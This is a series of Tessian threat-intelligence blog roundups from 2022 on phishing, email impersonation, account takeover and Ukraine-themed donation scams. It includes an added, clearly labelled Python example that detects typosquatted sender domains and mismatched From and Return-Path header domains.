To see how Tessian prevents ATO attacks and provides data loss prevention (DLP), watch a product overview video or book a demo. For the latest cybersecurity news and articles, sign up for our newsletter, and follow us on Twitter and LinkedIn.
Threat Intel
Tessian Threat Intel Roundup: July 2022
by John Filitz Friday, July 29th, 2022
Impersonation attacks are a significant contributing factor to the growing phishing challenge, with APWG reporting over 1 million phishing attacks in Q1 2022 – the highest number of attacks recorded for a quarter.
Threat actors are targeting well-known brands to carry out sophisticated social engineering attacks and are leveraging legitimate third parties to conduct their attacks. Threat actors are also using open source intelligence to impersonate and target specific individuals within companies.
Once trust has been established, the threat actor can further compromise the information system – this includes compromising vendors within the target’s supply chain – by delivering a malicious payload.
The challenge in detecting impersonation attacks is expected to become more protracted in the short term. This is because the majority of organizations still rely on legacy rule-based email security solutions that are unable to detect sophisticated impersonation attacks.
Sign-up for our Threat Intel update to get this monthly update straight to your inbox.
Impersonation attacks mimic well-known and trusted brands and will remain a mainstay for threat actors perpetrating attack campaigns that have fraud and account compromise as key objectives.
Impersonation attacks are becoming more targeted and are leveraging open source intelligence, targeting smaller companies as well as specific individuals at those companies, with the C-suite particularly targeted.
Legitimate third-party service providers, including mass-mailing services and payment providers, are increasingly being used by threat actors to deliver their attacks.
Account Takeover-based impersonation attacks, specifically within the supply chain ecosystem of a particular company, pose among the greatest threats. This is because the threat actor operates within the “circle of trust” and has access to multiple targets.
The FTC has reported a sharp increase in impersonation fraud, with losses totaling $2 billion in the period October 2020 to September 2021. Some of the leading corporations are the most impersonated. In the technology space, Microsoft, Google, Amazon and Apple are among the most impersonated brands.
Email impersonation attacks come in different guises, including:
Typosquatting – in this instance the threat actor sets up an email domain that appears to be legitimate, but with one or several characters replaced by look-alike characters, for example using zero instead of “o.”
Email domain spoofing – the threat actor manipulates the email headers so that a false email address is displayed to the recipient. For example, the sender’s actual email address is “fraudster@cybercrime.com,” but the recipient sees “billgates@microsoft.com” in their inbox. Often email domain spoofing will include some degree of brand impersonation, including use of brand logos and email footers, to enhance the apparent legitimacy of the malicious email.
Account Takeover – ATO attacks are possibly the most insidious form of impersonation attack, because the threat actor leverages a compromised and “trusted” email account to perpetrate the attack.
Threat actors often use a sense of urgency combined with some intelligence to get the target to carry out their request, for example requesting urgent payment of a known supplier invoice but to a bank account number controlled by the threat actor.
Malicious payloads in the form of attachments or links are also commonly used. The malicious nature of the payload is obfuscated to bypass rule-based security controls.
In the case of a malicious attachment, common obfuscation methods include changing the file name to end in “.doc” or “.pdf”; in the case of a malicious link, they include using third-party mailing services to deliver the links.
This can include the use of link redirects: the victim is sent a “safe” link to a legitimate website, which then redirects to a malicious website.
One noteworthy impersonation attack campaign was the NOBELIUM campaign detected by Microsoft Threat Intelligence. In this campaign, threat actors leveraged the legitimate mass-mailing service Constant Contact to impersonate the US International Development Aid agency (USAID) and distribute malicious URLs to a “wide variety of organizations and industry verticals.”
More recent impersonation campaigns are leveraging a combination of a phishing email and a call-back number, impersonating a well-known and trusted security vendor in an attempt to compromise the target via remote administration tools (RATs).
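As an added example that is not part of the original post, the following Python script flags the two header-level impersonation patterns described above: a look-alike sender domain built from character substitutions such as zero for “o” (typosquatting), and a From: address whose domain does not match the envelope Return-Path (one indicator of header spoofing). The trusted-domain list, the homoglyph table and the sample message are constructed for illustration and are not Tessian’s detection logic.

```python
"""Flag look-alike (typosquatted) and mismatched sender domains in an email.

Assumptions (not from the page): TRUSTED_DOMAINS is a constructed list,
SAMPLE is a constructed message, and HOMOGLYPHS is a small illustrative
subset of the substitutions seen in real typosquats.
"""
import email
from email import policy
from email.utils import parseaddr

# Constructed list of brand domains the organisation expects mail from.
TRUSTED_DOMAINS = {"microsoft.com", "paypal.com", "google.com"}

# Illustrative look-alike substitutions. Multi-character pairs come first so
# that "rn" -> "m" is applied before the single-character folds.
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]


def normalize(domain: str) -> str:
    """Fold common look-alike characters back to the letters they imitate."""
    d = domain.lower()
    for fake, real in HOMOGLYPHS:
        d = d.replace(fake, real)
    return d


def classify_domain(domain: str) -> str:
    """Return 'trusted', 'lookalike' or 'unknown' for a sender domain."""
    d = domain.lower()
    if d in TRUSTED_DOMAINS:
        return "trusted"
    # Not a trusted domain as written, but identical once look-alike
    # characters are folded: the typosquatting pattern described above.
    if normalize(d) in TRUSTED_DOMAINS:
        return "lookalike"
    return "unknown"


def analyze_message(raw: str) -> dict:
    """Return findings for a raw RFC 5322 message string."""
    msg = email.message_from_string(raw, policy=policy.default)
    _, from_addr = parseaddr(str(msg.get("From", "")))
    _, return_path = parseaddr(str(msg.get("Return-Path", "")))
    from_domain = from_addr.rpartition("@")[2].lower()
    rp_domain = return_path.rpartition("@")[2].lower()
    findings = {
        "from_domain": from_domain,
        "return_path_domain": rp_domain,
        "from_class": classify_domain(from_domain),
        # Displayed From: domain differs from the envelope sender domain.
        "envelope_mismatch": bool(rp_domain) and rp_domain != from_domain,
    }
    findings["suspicious"] = (
        findings["from_class"] == "lookalike" or findings["envelope_mismatch"]
    )
    return findings


# Constructed sample: the From: domain imitates PayPal with "1" for "l",
# while the envelope sender (Return-Path) is an unrelated domain.
SAMPLE = """\
Return-Path: <billing@example.net>
From: "PayPal Billing" <invoice@paypa1.com>
To: finance@example.org
Subject: Invoice payment overdue

Please settle the attached invoice today.
"""

if __name__ == "__main__":
    for key, value in analyze_message(SAMPLE).items():
        print(f"{key}: {value}")
```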
The need to upgrade email security is moving up the priority list.
Legacy rule-based solutions are unable to detect multi-tiered impersonation attacks that remain undocumented in the threat intel feeds on which legacy solutions rely.
Adaptive, machine learning powered behavioral detection is essential to detect unknown and rapidly evolving threats, including supplier-based ATO attacks.
Leveraging security solutions that incorporate security awareness training as part of active defense measures remains a key element of ensuring that end-users are in a better position to detect impersonation attacks.
To see how Tessian prevents ransomware attacks and provides data loss prevention (DLP), watch a product overview video or book a demo. For the latest cybersecurity news and articles, sign up for our newsletter, and follow us on Twitter and LinkedIn.
Threat Intel
Tessian Threat Intel Roundup for June
by Charles Brook Tuesday, July 5th, 2022
The Tessian Threat Intel team continues its focus on business email compromise (BEC) campaigns. We issued a Threat Advisory for a PayPal-themed campaign we have been tracking since January. The threat actors in this campaign are seeking to perpetrate payment fraud and potentially compromise credentials. Other key threats that we are focussing on include increasingly advanced methods for Account Takeover (ATO) and the persistent threat of email-delivered ransomware, including a spike in wiper malware. Sign-up for our Threat Intel update to get this monthly update straight to your inbox.
Tessian Threat Intelligence has recently tracked and observed scammers, on numerous occasions, sending emails with fake invoice payment requests from payment service providers such as PayPal. From the early evidence we are seeing, online fraud campaigns are on the rise, with the potential to evolve into ATO-based attacks. Although the primary targets are private consumers, we are likely to see similar attacks targeting vendors and suppliers in the enterprise. The increasing sophistication and targeted nature of attacks observed across the cybercrime landscape represent the maturation of cyber crime, with threat actors targeting specific entities rather than random targets. A number of these phishing attacks leverage open source information, as well as information gathered from previous data breaches, to identify high-yield targets.
Tessian Threat Intel continues to track BEC and payment fraud campaigns, with executive impersonation observed as a consistent theme.
Cryptocurrency payment fraud has already resulted in over $1 billion in losses according to the FTC and is up 60x in 2021 compared to 2018.
Ransomware-as-a-Service gang activity emanating from Russia is on the rise once again, with REvil re-emerging after an initial law enforcement crackdown.
Wiper malware is surging in 2022, first seen in Russian cyber attacks against Ukraine.
Russian APT groups have been observed exploiting the Follina vulnerability. Microsoft released a patch for Follina in June, but we may see a spike in attachment-themed phishing abusing the vulnerability before the fix is widely deployed.
Chinese APT groups have been using ransomware as a decoy to carry out espionage campaigns.
Other attack campaigns that have captured our attention include the increasing phenomenon of voicemail-themed phishing campaigns observed by Zscaler.
We expect email-delivered ransomware, including the growing prominence of wiper malware, to remain a leading threat in 2022.
A recently launched carding site, ‘BidenCash’, gave away a list of stolen card details for free across darkweb forums to promote its store.
Having intelligent and layered cybersecurity defenses in place, particularly securing email and the endpoint, is critical for staying safe. Leveraging behavioral cybersecurity solutions that can detect sophisticated social engineering attempts is essential, as threat actors continually develop intelligent methods to bypass rule-based security controls. Practicing good cybersecurity hygiene and regularly testing your security controls, including business continuity and disaster resilience capabilities, are of fundamental importance to cyber resilience. Conducting in-the-moment, contextual cybersecurity awareness training on advanced email threats for your employees should be prioritized – end-users are your first line of defense.
To see how Tessian prevents ransomware attacks and provides data loss prevention (DLP), watch a product overview video or book a demo. For the latest cybersecurity news and articles, sign up for our newsletter, and follow us on Twitter and LinkedIn.
Threat Intel
Tessian Threat Intel Roundup for May
by John Filitz Monday, May 30th, 2022
Tessian Threat Intel focussed on crypto and payment fraud campaigns for the month of May, particularly PayPal-related scams, which have become increasingly sophisticated over the last several months. Most recently we have identified scams involving fraudulent email invoices requesting payment via PayPal, with some of these scams requesting payment in Bitcoin. Keep reading for recommendations for staying safe, and sign-up for our Threat Intel update to get this monthly update straight to your inbox.
Social engineering remains a persistent global threat that continues to evolve to evade law enforcement and cybersecurity detection and prevention efforts.
Email-delivered crypto Business Email Compromise (BEC) campaigns are increasing in volume and sophistication.
Threat actors are targeting payment providers such as PayPal and fraudulently creating email invoices to perpetrate payment fraud.
Bitcoin is the preferred payment method due to its ability to traverse geographic borders.
In its latest annual IC3 report, the FBI notes that over $43 billion has been lost globally due to BEC compromises in the past 5 years. The true figure is likely significantly higher due to unreported incidents.
The FBI notes that phishing is increasing and remains the most reported cyber crime incident.
To stay safe: never click on links in suspicious emails, and be on the lookout for increasingly sophisticated BEC attempts to perpetrate invoice payment/wire fraud.
Tessian Threat Intel have noted an uptick in BEC efforts, with invoice/payment fraud the primary objective of threat actors.
We have been tracking payment provider related fraud since January 2022.
Also noteworthy is the increasing sophistication of campaigns targeting victims using a range of themes, including the COVID-19 pandemic and, more recently, the conflict in Ukraine.
Over the past 30 days we are still seeing an average of 45 new Ukraine-themed domains registered every day (see April’s roundup on Ukraine).
Key themes of the attacks still include crypto donation scams as well as ecommerce spam, romance scams, and loans for refugees.
The donation scams are increasing in volume and expanding in variety, with themes of humanitarian aid and support for children or refugees.
As the digital payment market grows, so too will the range of attacks.
Bitcoin remains the preferred medium of payment for the BEC campaigns we have been tracking.
The FBI notes a 65% increase in BEC fraud related losses globally in the period 2019 to December 2021.
Be suspicious of any invoice-related request, even from a trusted party.
Always verify the authenticity of the invoice by contacting the party via an independent method, for example by telephone – and never use a telephone number provided in the suspicious email.
Report suspicious emails to your security administrator.
Use an advanced email protection solution that relies on behavioral intelligence modeling rather than a static, rule-based approach to threat detection.
Report all BEC-related losses to your relevant law enforcement agency – only by having an accurate picture of the extent of the crime threat can we as a community harness the resources required to deal with this challenge effectively.
To see how Tessian prevents ransomware attacks and provides data loss prevention (DLP), watch a product overview video or book a demo. For the latest cybersecurity news and articles, sign up for our newsletter, and follow us on Twitter and LinkedIn.
Threat Intel
Tessian Threat Intel Roundup for April 2022
by Charles Brook Thursday, April 28th, 2022
Tessian Threat Intel introduces the key threat intelligence themes and topics we have been tracking for the month of April 2022. The key theme this month focussed on Ukraine-related cyber threat campaigns. We expect nation-state related attacks to escalate in the wake of the Russian invasion. Recommendations for staying safe include following best practice as outlined by CISA and NIST. Be sure to sign-up for our Threat Intel update to get this monthly update straight to your inbox.
Phishing campaigns escalated in the wake of the Ukraine invasion.
Ukrainian-themed QR code cryptocurrency donation fraud featured prominently in phishing campaigns in the wake of the invasion.
A ramp-up of cyber retaliation by Russia against western countries and targets is expected in the coming weeks.
The Ukraine invasion is among the first conventional nation-state conflicts to feature a cyber-war (hybrid war) component.
In order to disrupt nation-state campaigns in Ukraine, public-private partnerships such as the one demonstrated by Microsoft will be key in addressing this threat vector.
The cyber insurance industry, already in choppy waters before the Ukraine invasion, is set for further turmoil concerning coverage limitations and premiums.
LinkedIn is now the most popular brand for impersonation in phishing attacks.
Tessian Threat Intel have noted a significant escalation of phishing threats in the wake of the Ukraine invasion.
We take the view, along with our colleagues, that Russian-affiliated APT groups are expected to escalate their attacks on countries allied with Ukraine, with the US, the UK, and the EU key targets in this regard.
Nation-state cyber attacks are expected to feature more prominently in conventional nation-state conflict, based on recent outcomes from the Ukraine invasion.
Cyber insurance premiums have doubled over the past 12 months, while coverage has been dramatically reduced.
A number of leading cyber insurance providers have recently amended their policy coverage to reflect this changing geopolitical risk landscape and specifically exclude acts of war.
Threat actors take advantage of key events, including conflict and natural disasters, as we witnessed during the recent pandemic.
Having dedicated executive support and resourcing for cybersecurity programs in the enterprise, as outlined by CISA, is essential.
Defense in depth is key to reducing the likelihood of a successful breach.
Leveraging Threat Intel insights from your peers and from the cybersecurity vendor community is an important component of keeping aware of the rapidly evolving threatscape.
Cyber insurance is quickly becoming unaffordable to most small and medium sized companies. This may result in tough trade-offs for firms.
Bottom line: making strategic investments in cybersecurity programs is more important than ever.
To see how Tessian prevents ransomware attacks and provides data loss prevention (DLP), watch a product overview video, download our platform architecture whitepaper, or book a demo. For the latest cybersecurity news and articles, sign up for our newsletter, and follow us on Twitter and LinkedIn.
Threat Intel, ATO/BEC
Phishing Campaigns Pick-Up in the Wake of the Ukraine Invasion
by Charles Brook Tuesday, April 5th, 2022
Key Takeaways
We’ve seen an upward trend in the number of suspicious emails being flagged related to Ukraine. Spam campaigns started to appear only one day after the initial invasion by Russia.
The number of new domains containing “Ukraine” registered in 2022 is up 210% from 2021.
An average of 315 new Ukraine-themed domains has been observed per day since 24 February. 77% of these domains appear to be suspicious based on early indicators.
Overview
The conflict taking place in Ukraine has quickly become a common theme for threat actors and scammers alike. Tessian has observed an upward trend in Ukraine-themed emails flagged by our platform, including a number of threat campaigns that are exploiting the conflict as a theme for new scams, malspam, and phishing. In line with this, open source intelligence shows a significant increase in the number of Ukraine-themed domains being registered, which can be used for malicious purposes.
The scams observed typically request donations in the form of cryptocurrency under the pretense of supporting the Ukrainian humanitarian effort in the wake of the Russian invasion. The spam is similar to common campaigns previously observed, pushing links to suspicious e-commerce sites selling Ukrainian-themed items.
Trend analysis
Domain registrations
There has been a significant upward trend in the number of new domains being registered that contain “Ukraine”. The number of these domains being registered is up more than 210% in 2022 compared to 2021. Researching domain registrations, we can see the upward trend progressing over the past two months.
Since early March there has been an average of 340 new domains registered each day, either containing “Ukraine” or closely resembling the word. Our platform observed an initial upward trend in Ukraine-themed emails, which peaked in early March. This included the spam campaigns and donation scams.
Threat campaign explainer
Donation scams
Donations from around the world have been made in support of Ukraine in the wake of the Russian invasion. Unfortunately, leveraging humanitarian efforts such as the one currently underway in Ukraine to perpetrate phishing-related fraud has become a common modus operandi for threat actors and fraudsters. This explains why phishing remains among the top reported cybersecurity incidents according to the FBI’s latest Internet Crime Report, with over 323k reported incidents for 2021.
The donation scams vary in sophistication, from basic emails containing a short message with a plea for help, to fake websites set up to impersonate charitable organizations like the British Red Cross.
One of these scam emails claims to be supporting the humanitarian aid effort in Ukraine and requests Bitcoin cryptocurrency donations. Legitimate website text and logos from the likes of UNICEF, Actalliance and the Australian Council for International Affairs (ACFID) are being fraudulently leveraged to enhance the authenticity of the phishing emails.
The threat campaign detailed below, purporting to be a legitimate humanitarian aid effort for Ukraine from the ACFID, requests Bitcoin donations and allows victims to make the donation via a direct Bitcoin address or via a malicious QR code.
[Figure: Phishing email purporting to be from the ACFID]
Scanning the QR code with the iOS camera app prompts the user to open a locally installed payment app that supports Bitcoin, in this case Cash App. According to Blockchain Explorer, the last transaction to take place with the address in this email was on 2022-02-14, with only 6 transactions in total.
Another donation scam was sent from a newly registered domain, redcrossukraine[.]org, impersonating the Red Cross in Ukraine. The email contained a link to a professional-looking website containing details of the Ukraine conflict as well as instructions on how to donate cryptocurrency in aid of Ukraine.
The site was based on a Bootstrap template by BootstrapMade, which gave it the look and feel of a legitimate website. Towards the bottom were addresses for 3 different crypto wallets to which victims could send payments as a ‘donation’: one for Bitcoin, one for Ethereum, and one for Tether.
Ukraine-themed spam
Spammers have also quickly reacted to the invasion of Ukraine by adjusting the themes of their campaigns. One notable spam campaign, only a day after the initial invasion, began blasting out spam with links to suspicious e-commerce sites pushing the sale of t-shirts and other items to show support for Ukraine.
The emails sent out in the campaign have subjects like “I Stand With Ukraine Shirts” and contain images of t-shirts with slogans in support of Ukraine. The emails also contain links pointing to recently created sites like mimoprint[.]info or mabil-store[.]com, where recipients can browse and purchase some of the products referenced in the email. Searching for these sites online reveals reviews claiming that they are a scam and that no product is received when a purchase is made. Other reviews claim they steal designs from users on other sites.
Recommended action
Some charities are accepting cryptocurrency donations, but be cautious of any email purporting to collect donations for the humanitarian effort in Ukraine. If cryptocurrency is requested in an unsolicited email, the likelihood is that it is a scam.
Before interacting with any Ukraine-themed email received, check the source and email headers to confirm that the organization it originated from is legitimate.
If you want to make a donation in support of Ukraine, the best way is to go directly to your preferred charitable organization. CNET has published a list of reputable charities to which you can donate in aid of Ukraine.